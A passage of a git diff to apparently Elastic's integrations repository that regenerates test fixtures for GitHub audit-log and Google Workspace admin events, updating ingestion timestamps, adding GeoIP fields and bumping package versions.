"{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146170407,\"action\":\"protected_branch.create\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -5972,7 +5972,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041755598Z", + "ingested": "2021-12-14T14:44:07.248241013Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146506531,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -6012,7 +6012,7 @@ }, "event": { "action": "required_status_check.create", - "ingested": "2021-10-12T20:36:26.041760578Z", + "ingested": "2021-12-14T14:44:07.248241397Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146549475,\"action\":\"required_status_check.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6052,7 +6052,7 @@ }, "event": { "action": "repo.rename", - "ingested": "2021-10-12T20:36:26.041765337Z", + "ingested": "2021-12-14T14:44:07.248241785Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1630625448041,\"action\":\"repo.rename\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6092,7 +6092,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041770436Z", + "ingested": "2021-12-14T14:44:07.248242170Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631310992353,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6132,7 +6132,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041775866Z", + "ingested": "2021-12-14T14:44:07.248242569Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631573290891,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -6172,7 +6172,7 @@ }, "event": { "action": "protected_branch.update_admin_enforced", - "ingested": "2021-10-12T20:36:26.041781357Z", + "ingested": "2021-12-14T14:44:07.248242971Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655683,\"action\":\"protected_branch.update_admin_enforced\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6212,7 +6212,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041786537Z", + "ingested": "2021-12-14T14:44:07.248243354Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632421366852,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6252,7 +6252,7 @@ }, "event": { "action": "repo.access", - "ingested": "2021-10-12T20:36:26.041791937Z", + "ingested": "2021-12-14T14:44:07.248243746Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630625423921,\"action\":\"repo.access\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6292,7 +6292,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041796956Z", + "ingested": "2021-12-14T14:44:07.248244139Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631314271117,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -6332,7 +6332,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041802056Z", + "ingested": "2021-12-14T14:44:07.248244529Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834442043,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6372,7 +6372,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041807145Z", + "ingested": "2021-12-14T14:44:07.248244932Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834270875,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6412,7 +6412,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041812315Z", + "ingested": "2021-12-14T14:44:07.248245320Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632177923051,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6452,7 +6452,7 @@ }, "event": { "action": "protected_branch.update_linear_history_requirement_enforcement_level", - "ingested": "2021-10-12T20:36:26.041817575Z", + "ingested": "2021-12-14T14:44:07.248245704Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999556056,\"action\":\"protected_branch.update_linear_history_requirement_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -6492,7 +6492,7 @@ }, "event": { "action": "protected_branch.update_required_status_checks_enforcement_level", - "ingested": "2021-10-12T20:36:26.041824257Z", + "ingested": "2021-12-14T14:44:07.248246143Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155595828,\"action\":\"protected_branch.update_required_status_checks_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6532,7 +6532,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041829257Z", + "ingested": "2021-12-14T14:44:07.248246522Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632181439344,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6572,7 +6572,7 @@ }, "event": { "action": "project.create", - "ingested": "2021-10-12T20:36:26.041834236Z", + "ingested": "2021-12-14T14:44:07.248246908Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631317044168,\"action\":\"project.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6611,7 +6611,7 @@ }, "event": { "action": "org.audit_log_export", - "ingested": "2021-10-12T20:36:26.041841059Z", + "ingested": "2021-12-14T14:44:07.248247314Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"created_at\":1631999791816,\"action\":\"org.audit_log_export\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -6655,7 +6655,7 @@ }, "event": { "action": "team.add_member", - "ingested": "2021-10-12T20:36:26.041845968Z", + "ingested": "2021-12-14T14:44:07.248247694Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1632173981540,\"action\":\"team.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -6704,7 +6704,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041851228Z", + "ingested": "2021-12-14T14:44:07.248248086Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632178684304,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6744,7 +6744,7 @@ }, "event": { "action": "protected_branch.update_linear_history_requirement_enforcement_level", - "ingested": "2021-10-12T20:36:26.041856287Z", + "ingested": "2021-12-14T14:44:07.248248480Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155595845,\"action\":\"protected_branch.update_linear_history_requirement_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6784,7 +6784,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041861267Z", + "ingested": "2021-12-14T14:44:07.248249097Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155621270,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -6824,7 +6824,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041866186Z", + "ingested": "2021-12-14T14:44:07.248249484Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632181178974,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6864,7 +6864,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041871145Z", + "ingested": "2021-12-14T14:44:07.248249943Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504576,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6904,7 +6904,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041876145Z", + "ingested": "2021-12-14T14:44:07.248250333Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631310927600,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -6942,7 +6942,7 @@ }, "event": { "action": "pull_request_review_comment.create", - "ingested": "2021-10-12T20:36:26.041881024Z", + "ingested": "2021-12-14T14:44:07.248250713Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1631573139911,\"action\":\"pull_request_review_comment.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -6983,7 +6983,7 @@ }, "event": { "action": "repository_vulnerability_alerts.disable", - "ingested": "2021-10-12T20:36:26.041885733Z", + "ingested": "2021-12-14T14:44:07.248251108Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632145649767,\"action\":\"repository_vulnerability_alerts.disable\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -7027,7 +7027,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041890762Z", + "ingested": "2021-12-14T14:44:07.248251494Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146087112,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7070,7 +7070,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041895561Z", + "ingested": "2021-12-14T14:44:07.248251884Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631896070699,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7110,7 +7110,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041900320Z", + "ingested": "2021-12-14T14:44:07.248252638Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631898264113,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -7150,7 +7150,7 @@ }, "event": { "action": "team.create", - "ingested": "2021-10-12T20:36:26.041905129Z", + "ingested": "2021-12-14T14:44:07.248253073Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/contributors\"},\"org\":\"Example-Org\",\"created_at\":1631999351150,\"action\":\"team.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7194,7 +7194,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041909888Z", + "ingested": "2021-12-14T14:44:07.248253453Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630619298089,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7237,7 +7237,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041914697Z", + "ingested": "2021-12-14T14:44:07.248253840Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631314239837,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7277,7 +7277,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041919316Z", + "ingested": "2021-12-14T14:44:07.248254227Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631575217017,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -7317,7 +7317,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041923944Z", + "ingested": "2021-12-14T14:44:07.248254624Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999520452,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7357,7 +7357,7 @@ }, "event": { "action": "protected_branch.update_pull_request_reviews_enforcement_level", - "ingested": "2021-10-12T20:36:26.041928593Z", + "ingested": "2021-12-14T14:44:07.248255015Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655636,\"action\":\"protected_branch.update_pull_request_reviews_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7397,7 +7397,7 @@ }, "event": { "action": "protected_branch.update_admin_enforced", - "ingested": "2021-10-12T20:36:26.041933112Z", + "ingested": "2021-12-14T14:44:07.248255409Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632155595860,\"action\":\"protected_branch.update_admin_enforced\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7437,7 +7437,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041937941Z", + "ingested": "2021-12-14T14:44:07.248255936Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146507567,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -7477,7 +7477,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041942549Z", + "ingested": "2021-12-14T14:44:07.248256326Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146506554,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7517,7 +7517,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041947228Z", + "ingested": "2021-12-14T14:44:07.248256703Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632437191581,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7557,7 +7557,7 @@ }, "event": { "action": "protected_branch.policy_override", - "ingested": "2021-10-12T20:36:26.041952007Z", + "ingested": "2021-12-14T14:44:07.248257091Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146375501,\"action\":\"protected_branch.policy_override\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -7597,7 +7597,7 @@ }, "event": { "action": "pull_request.ready_for_review", - "ingested": "2021-10-12T20:36:26.041956726Z", + "ingested": "2021-12-14T14:44:07.248257478Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632439409862,\"action\":\"pull_request.ready_for_review\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -7636,7 +7636,7 @@ }, "event": { "action": "org.audit_log_git_event_export", - "ingested": "2021-10-12T20:36:26.041961365Z", + "ingested": "2021-12-14T14:44:07.248257860Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"created_at\":1632712526255,\"action\":\"org.audit_log_git_event_export\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" diff --git a/packages/github/manifest.yml b/packages/github/manifest.yml index 1e22b323c4e..d58d3fd3767 100644 --- a/packages/github/manifest.yml +++ b/packages/github/manifest.yml @@ -1,6 +1,6 @@ name: github title: GitHub -version: 0.2.0 +version: 0.2.1 release: experimental description: Collect events from GitHub with Elastic Agent. type: integration diff --git a/packages/google_workspace/changelog.yml b/packages/google_workspace/changelog.yml index 5e6d2d6ad32..194e93700ae 100644 --- a/packages/google_workspace/changelog.yml +++ b/packages/google_workspace/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json index 13667692276..53d80981b6b 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json 
@@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232161700Z", + "ingested": "2021-12-14T14:44:14.844997847Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_APPLICATION_SETTING", @@ -99,6 +111,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -108,7 +132,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232166900Z", + "ingested": "2021-12-14T14:44:14.845000165Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CREATE_APPLICATION_SETTING", @@ -164,6 +188,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -173,7 +209,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232172300Z", + "ingested": "2021-12-14T14:44:14.845000607Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "DELETE_APPLICATION_SETTING", @@ -229,6 +265,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -238,7 +286,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232179800Z", + "ingested": "2021-12-14T14:44:14.845001004Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "REORDER_GROUP_BASED_POLICIES_EVENT", @@ -294,6 +342,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -303,7 +363,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232187800Z", + "ingested": "2021-12-14T14:44:14.845001388Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "GPLUS_PREMIUM_FEATURES", 
@@ -357,6 +417,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -366,7 +438,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232194900Z", + "ingested": "2021-12-14T14:44:14.845001857Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "CREATE_MANAGED_CONFIGURATION", @@ -419,6 +491,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -428,7 +512,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232202500Z", + "ingested": "2021-12-14T14:44:14.845002248Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "DELETE_MANAGED_CONFIGURATION", @@ -481,6 +565,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -490,7 +586,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232209900Z", + "ingested": "2021-12-14T14:44:14.845002626Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_MANAGED_CONFIGURATION", 
@@ -544,6 +640,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -553,7 +661,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232262300Z", + "ingested": "2021-12-14T14:44:14.845003012Z", "original": 